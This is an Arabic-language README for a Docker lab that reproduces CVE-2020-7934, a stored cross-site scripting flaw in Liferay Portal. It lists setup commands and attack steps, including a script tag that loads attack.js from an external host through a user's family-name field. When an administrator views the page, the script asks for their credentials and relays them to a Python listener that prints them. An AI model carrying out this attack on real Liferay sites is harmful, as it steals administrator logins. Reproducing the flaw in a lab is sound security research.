CVE 2020-7934
كيفية تشغيل CVE
المتطلبات
- docker
ملاحظات
من الممكن وضع سكريبت الهجوم على الإنترنت (مع كود js) http://yourjavascript.com/
سكريبت Js الخاص بنا على الإنترنت للهجوم
html <script src="http://yourjavascript.com/920172199111/attack.js"></script>
أوامر التهيئة
- انتقل إلى المجلد الجذر لهذا المشروع
- شغل "sudo docker-compose up --build"
- طرفية جديدة: شغل "docker inspect liferay" ==> وانسخ قيمة IPAddress
- طرفية جديدة: شغل "python api_attacker.py"
- افتح متصفحًا واذهب إلى "http://IPAddress:8080" ==> يجب أن تحصل على بوابة liferay كاستجابة
- لإيقاف وحذف الحاويات استخدم "sudo docker-compose rm"
تعليمات الهجوم
- سجل في liferay كمستخدم، وسجل الدخول، وفي قسم "المواقع المتاحة"، انضم إلى موقع "liferay".
- غيّر "اسم العائلة" في سكريبت JS (مباشرة () أو من خلال "src =" http ... "")
- سجل الدخول كمسؤول liferay (اسم المستخدم: [email protected]، كلمة المرور: test)
- اذهب إلى المواقع المتاحة وانقر على "liferay"، ستفتح الصفحة العامة لهذا الموقع.
- اذهب إلى الصفحة الجديدة، ستظهر قائمة على اليمين، انقر على "العضوية".
- حدد المستخدم المسجل في الخطوة 1. في تلك اللحظة سيتم تنفيذ السكريبت.
5.1) في سكريبت attack.js ستطلب الصفحة بيانات الاعتماد.
- في طرفية الخطوة 5 (من أوامر التهيئة) سيتم طباعة اسم المستخدم/كلمة المرور التي تم إدخالها في 5.1 (من قبل المسؤول) )